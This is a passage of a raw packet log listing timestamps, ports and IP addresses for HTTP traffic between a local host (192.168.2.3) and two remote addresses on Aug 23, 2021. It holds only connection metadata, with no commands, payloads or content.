Aug 23, 2021 02:08:38.465470076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465507030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465543032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465553045 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465580940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465584993 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465617895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465665102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465706110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465708971 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465745926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465748072 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465784073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465822935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465858936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465869904 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465897083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465902090 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465934992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465982914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466027021 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466043949 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466065884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466082096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466104031 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466141939 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466177940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466190100 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466217995 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466219902 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466254950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466301918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466345072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466356039 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466382980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466387987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466420889 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466458082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466494083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466502905 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466531992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466535091 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466569901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466617107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466658115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.466661930 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.466696978 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482073069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482134104 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482172012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482211113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482250929 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482311010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482326984 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482350111 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482352018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482356071 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482388973 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482426882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482462883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482472897 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482498884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482508898 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482536077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482573032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482619047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482620001 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482659101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482660055 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482697010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482736111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482773066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482784033 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482810020 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482819080 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482847929 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482919931 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482955933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.482984066 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.482992887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483023882 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.483030081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483077049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483130932 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.483144999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483185053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483187914 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.483222961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483258963 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483295918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483305931 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.483333111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483338118 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.483370066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483407021 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483453035 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.483453035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483494043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.483496904 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.483530045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.486954927 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.497730970 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.497800112 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.497843027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.497879982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.497911930 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.497917891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.497948885 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.497958899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.497996092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498004913 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498034954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498073101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498121023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498128891 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498163939 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498167992 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498202085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498243093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498281956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498292923 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498317957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498341084 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498357058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498394966 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498440981 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498441935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498485088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498490095 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498522043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498559952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498598099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498610973 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498634100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498653889 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498671055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498708010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498749971 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498754978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498795986 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498797894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498833895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498871088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498907089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498910904 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498943090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.498945951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.498980999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499020100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499061108 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499066114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499104977 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499108076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499177933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499218941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499257088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499273062 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499294043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499315977 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499341965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499388933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499425888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499437094 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499464989 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499466896 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499504089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499541044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499578953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499583960 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499614954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499619961 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499661922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499702930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499739885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499743938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499777079 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499778986 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499814034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499850988 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499861956 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499887943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499926090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.499928951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.499972105 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500013113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500030041 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500050068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500089884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500119925 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500128984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500165939 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500179052 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500204086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500242949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500247002 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500292063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500339985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500376940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500390053 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500417948 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500430107 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500456095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500493050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500530958 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500543118 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500567913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500571012 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500616074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500658989 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500696898 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500725985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500727892 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500762939 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500765085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500812054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500854015 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500855923 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500893116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500895023 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.500931025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.500968933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501004934 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501015902 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.501045942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501061916 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.501084089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501131058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501173019 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501209974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501250029 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.501281023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501317978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501348019 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.501355886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501394033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501430988 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501441002 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.501477957 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.501478910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501522064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501558065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.501575947 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.514533043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514581919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514626980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514658928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514679909 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.514703035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514731884 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.514743090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514748096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.514780045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514811039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514836073 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.514842033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514874935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514884949 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.514906883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514939070 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514970064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.514993906 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515008926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515022993 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515044928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515077114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515088081 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515110016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515167952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515198946 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515228987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515240908 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515269995 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515278101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515310049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515341997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515352011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515373945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515383959 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515405893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515436888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515469074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515481949 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515508890 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515520096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515544891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515575886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515609026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515619993 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515641928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515650988 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515672922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515706062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515738010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515748024 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515778065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.515779018 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.515814066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.517800093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.517885923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.517939091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.517976999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.518016100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.518032074 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.518054962 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.518081903 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.518105030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.518151999 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.547442913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.547478914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.547502041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.547523975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.547547102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.547569990 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.547610998 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.547668934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.599075079 CEST	49734	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:38.811415911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.811523914 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.868582964 CEST	80	49734	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:39.309715986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.309832096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.361705065 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.392663002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392688990 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392700911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392714024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392730951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392746925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392762899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392780066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392791033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392802954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392817020 CEST	49735	80	192.168.2.3	193.142.59.123
